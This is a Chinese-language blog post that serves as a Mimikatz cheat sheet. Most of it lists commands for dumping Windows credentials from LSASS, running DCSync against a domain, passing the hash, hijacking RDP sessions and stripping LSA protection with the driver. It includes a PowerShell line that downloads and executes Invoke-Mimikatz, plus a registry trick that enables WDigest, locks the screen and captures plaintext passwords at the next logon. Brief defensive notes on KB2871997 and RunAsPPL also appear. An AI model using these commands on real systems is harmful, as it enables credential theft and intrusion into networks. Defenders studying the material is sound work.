神器 mimikatz

发布于 2024-11-22 21:37:59 字数 5880 浏览 9 评论 0

Mimikatz 是从 Windows 系统中收集凭证数据最好的工具之一。事实上,我个人认为 Mimikatz 是收集 Windows 系统凭证数据的 瑞士军刀(多个利器的集合)

一个可以做任何事情的工具。由于 Mimikatz 的作者 Benjamin Delpy 是法国人,所以描述关于 Mimikatz 用法的资源都是法语的,至少在他的博客中是这样的

Mimikatz 的 GitHub 页面是英文的,包括了命令的用法等有用信息。
Mimikatz 是 Benjamin Delpy (@gentilkiwi) 在 2007 年使用 C 语言编写的一个 Windows x32/x64 程序,用于了解更多关于 Windows 的凭据数据(并作为 POC)

有两个可选的组件能提供一些额外的功能,mimidrv(与 Windows 内核交互的驱动程序)和 mimilib(绕过 AppLocker,验证包/SSP,密码过滤器以及用于 WinDBG 的 sekurlsa)

在用户登录之后,会生成很多凭证数据并存储在本地安全权限服务的进程(LSASS)内存中。其目的是为了方便单点登录(SSO)在每次对资源进行访问请求时确保用户不会被提示。凭证数据包括 NTLM 密码哈希,LM 密码哈希(如果密码长度小于 15 个字符),甚至明文密码(以支持其他的 WDigest 和 SSP 认证)。虽然可以阻止 Windows 创建 LM 哈希到本地计算机的 SAM 数据库(或 AD 数据库),但这并不能阻止系统在内存中生成 LM 哈希。

默认情况下,在 Windows Server 2008 和 Windows Vista 中不再生成用户的 LM 哈希,除非明确的启用了该功能。从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和 纯文本 密码将不在内存中生成。此功能也被 移植 到了较早版本的 Windows 中,Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁。为了防止在 LSASS 进程中放置 明文 密码,下面的注册表键被设置为 0 需要修改为 1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest 'UseLogonCredential'(DWORD)

exe
https://github.com/gentilkiwi/mimikatz
powershell
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

exe 版使用

提升权限
privilege::debug

清屏
cls

日志
log
将所有输出记录到文件 mimikatz.log 默认情况下

退出
exit

查看 mimikatz 的版本
version

查看当前登录的系统用户
system::user

查看计算机名称
system::computer

列出进程
process::list

暂停进程
process::suspend 进程名称

结束进程
process::stop 进程名称

列出系统的核心模块及所在位置
process::modules

列出系统的服务
service::list

移除系统的服务
service::remove

启动或停止服务
service::start stop 服务名称

列出权限列表
privilege::list

激活一个或多个权限
privilege::enable

打开系统的 cmd.exe
nogpo::cmd

打开系统的注册表
nogpo::regedit

打开任务管理器
nogpo::taskmgr

显示所有会话 id
ts::sessions

劫持 rdp 切换到别的的用户桌面会话
ts::remote /id:

显示进程和对应的 pid 情况等
ts::processes

dcsync 直接从 NTDS.DIT 中检索密码
lsadump::dcsync /domain:*** /all /csv

使用/user 参数指定域用户名,Mimikatz 可以转储特定用户的所有帐户信息,包括其密码哈希
lsadump::dcsync /domain:*** /user:test

向 LSA Server 质询检索 SAM/AD 的数据
"privilege::debug" "lsadump::lsa /inject"

获取本地用户信息及密码
sekurlsa::wdigest

获取 tspkg 用户信息及密码
sekurlsa::tspkg

获登陆用户信息及密码
sekurlsa::logonPasswords

取消多用户远程登陆限制
ts::multirdp

列出 Kerberos 密钥
SEKURLSA::Ekeys

列出所有已通过认证的用户的 Kerberos 凭证(包括服务帐户和计算机帐户)
SEKURLSA::Kerberos

获取域中 Kerberos 服务帐户(KRBTGT)的密码数据
SEKURLSA::Krbtgt

列出所有可用的提供者的凭据。这个命令通常会显示最近登录过的用户和最近登录过的计算机的凭证。
SEKURLSA::LogonPasswords

将获取到的信息保存到 txt 中
mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

在内网域渗透中知道用户名和哈希值但解密不了可以这样
使用 NTLM hash 远程连接
mimikatz "privilege::debug" "sekurlsa::pth /user:*** /domain:*** /ntlm:***"
"/run:mstsc.exe /restrictedadmin"
"/run:cmd"
默认为运行 cmd
dir \\ip\c$

启用 LSA 保护
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa 设置注册表键的值为:RunAsPPL=dword:00000001
创建一个新的 GPO 并浏览到 计算机配置—首选项-Windows 设置。右键单击注册表—新建,然后单击注册表项。弹出新的注册表属性对话框。
在配置单元列表中,单击 HKEY_LOCAL_MACHINE 在注册表键路径列表中浏览到 SYSTEM\CurrentControlSet\Control\Lsa 在值名称框中,输入 RunAsPPL,在值类型框中单击 REG_DWORD ,在数值数据框中,输入 00000001,最后单击确定
LSA 保护阻止了一个非受保护的进程与 LSASS 进行交互。但是 Mimikatz 仍然可以使用驱动程序绕过!+
Mimikatz# !+
Mimikatz# !processprotect /process:lsass.exe /remove

powershell 使用

set-executionpolicy remotesigned 取消执行限制

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"

Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz

在 windows2012 和 windows8 下 Mimikatz 无法显示明文

原因 KB2871997 补丁
更新 KB2871997 补丁后,可禁用 Wdigest Auth 强制系统的内存不保存明文口令,此时 mimikatz 和 wce 均无法获得系统的明文口令。
但是其他一些系统服务(如 IIS 的 SSO 身份验证) 在运行的过程中需要 Wdigest Auth 开启,所以补丁采取了折中的办法——安装补丁后可选择是否禁用 Wdigest Auth。
当然,如果启用 Wdigest Auth,内存中还是会保存系统的明文口令。
方法:
修改注册表——等待用户登陆抓取密码

修改注册表开启 UseLogonCredential
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

锁屏
锁屏操作的快捷键为 Win+L
cmd 下命令为:
rundll32 user32.dll,LockWorkStation

等用户下次再登录的时候,可抓到明文密码
mimikatz.exe privilege::debug sekurlsa::logonpasswords

参考: https://wooyun.js.org/drops/Mimikatz%20 非官方指南和命令参考_Part3.html
https://blog.csdn.net/qq_27446553/article/details/51745845
http://www.91ri.org/15178.html
http://www.91ri.org/15185.html
英文: https://adsecurity.org/?page_id=1821#MISCMemSSP

如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。

扫码二维码加入Web技术交流群

发布评论

需要 登录 才能够评论, 你可以免费 注册 一个本站的账号。
列表为空,暂无数据

关于作者

文章
评论
27 人气
更多

推荐作者

夢野间

文章 0 评论 0

百度③文鱼

文章 0 评论 0

小草泠泠

文章 0 评论 0

zhuwenyan

文章 0 评论 0

weirdo

文章 0 评论 0

坚持沉默

文章 0 评论 0

    我们使用 Cookies 和其他技术来定制您的体验包括您的登录状态等。通过阅读我们的 隐私政策 了解更多相关信息。 单击 接受 或继续使用网站,即表示您同意使用 Cookies 和您的相关数据。
    原文